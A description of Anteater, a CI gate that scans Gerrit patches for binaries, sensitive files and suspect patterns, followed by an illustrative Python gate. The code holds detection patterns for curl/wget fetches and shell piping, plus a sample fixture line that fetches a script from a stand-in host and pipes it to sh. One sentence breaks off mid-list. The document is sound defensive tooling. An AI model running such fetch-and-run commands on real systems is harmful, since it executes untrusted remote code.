CI Gate Security for Gerrit
Anteater scans every committed patch sent to a Gerrit code review site. Each
time a patch is pushed to a repository, Jenkins instantiates Anteater, which
then runs a series of security checks on each file proposed in the patch.
The checks first verify that no binaries / blobs are present. If any are
found, the patch is immediately voted '-1' (do not merge) until a review has
taken place to ensure the binary is safe and its origins are known. Once agreed
as safe, a sha256 checksum of the file is entered into Anteater's 'exception'
list to ensure it cannot be maliciously replaced at any time in the future.
Checks are also made to ensure the files are not of a sensitive nature: for
example, cryptographic keys and application configuration files known to
contain sensitive details are all blocked from merge.
Finally, a deep scan is performed to look for suspect patterns, such as scripts
pulling in files / objects from untrusted sites, or various patterns such as
Anteater uses an open framework that lets users add new checks easily, without
having to touch any code.
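As an added illustration (not Anteater's own code), a minimal Python gate in the same spirit as the checks described above: it flags unreviewed binaries via NUL-byte detection and a sha256 allowlist, blocks sensitive file names, and scans text files for fetch-and-execute patterns. The policy lists, file names and sample patch are constructed for this example.

```python
import hashlib
import re
# Constructed policy for this example; Anteater keeps its real exception list
# and pattern definitions in its own config files, which are not reproduced here.
BINARY_SHA256_ALLOWLIST = set()  # sha256 hex digests of reviewed, known-good blobs
SENSITIVE_NAME_PATTERNS = [r"\.pem$", r"(^|/)id_(rsa|ed25519)$", r"\.p12$", r"(^|/)\.env$"]
SUSPECT_CONTENT_PATTERNS = [
    r"\b(curl|wget)\b[^\n|]*https?://",  # script fetching content from a remote site
    r"\|\s*(ba)?sh\b",                    # piping fetched content straight into a shell
]

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def is_binary(data: bytes) -> bool:
    return b"\x00" in data[:8192]  # treat a NUL byte in the first 8 KiB as "blob"

def check_file(path: str, data: bytes, allowlist=BINARY_SHA256_ALLOWLIST) -> list:
    """Return a list of findings for one file in the patch (empty means clean)."""
    findings = []
    if is_binary(data):
        digest = sha256_hex(data)
        if digest not in allowlist:  # unreviewed blob: block until a human reviews it
            findings.append(f"{path}: unreviewed binary (sha256 {digest})")
        return findings  # blobs are not pattern-scanned
    for pat in SENSITIVE_NAME_PATTERNS:
        if re.search(pat, path):
            findings.append(f"{path}: sensitive file name matches {pat!r}")
    text = data.decode("utf-8", errors="replace")
    for pat in SUSPECT_CONTENT_PATTERNS:
        for m in re.finditer(pat, text):
            line = text.count("\n", 0, m.start()) + 1
            findings.append(f"{path}:{line}: suspect pattern {pat!r}")
    return findings

def gate_vote(patch_files: dict, allowlist=BINARY_SHA256_ALLOWLIST) -> tuple:
    """Vote -1 if any file has findings, else +1; patch_files maps path -> bytes."""
    findings = []
    for path, data in sorted(patch_files.items()):
        findings.extend(check_file(path, data, allowlist))
    return (-1 if findings else 1), findings

# Constructed sample patch: one clean doc, one fetch-and-run script, one key, one blob.
SAMPLE_PATCH = {
    "docs/README.md": b"# Anteater\n",
    "tools/bootstrap.sh": b"#!/bin/sh\ncurl -s http://example.invalid/x.sh | sh\n",
    "certs/server.pem": b"-----BEGIN PRIVATE KEY-----\n...\n",
    "build/helper.bin": b"\x7fELF\x00\x01\x02",
}
```

Once a reviewer has approved the blob, adding its digest to the allowlist turns the -1 into a +1 while any later replacement of the file with different bytes is blocked again.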
Anteater was developed to address concerns over recent high-profile attacks
against CI environments, in which attackers backdoored build / DevOps systems
by various means (such as stealing a user's SSH key and self-approving
patches). Automated, non-human checks add an extra layer of security review,
with the ability to block a patch merge at the gate.
The project is mainly used in the Linux Foundation's OPNFV platform, which has
over 40 repositories that need monitoring. Plans are in place to port it to the
GitHub API, where it can operate as a review bot as part of a GitHub-hosted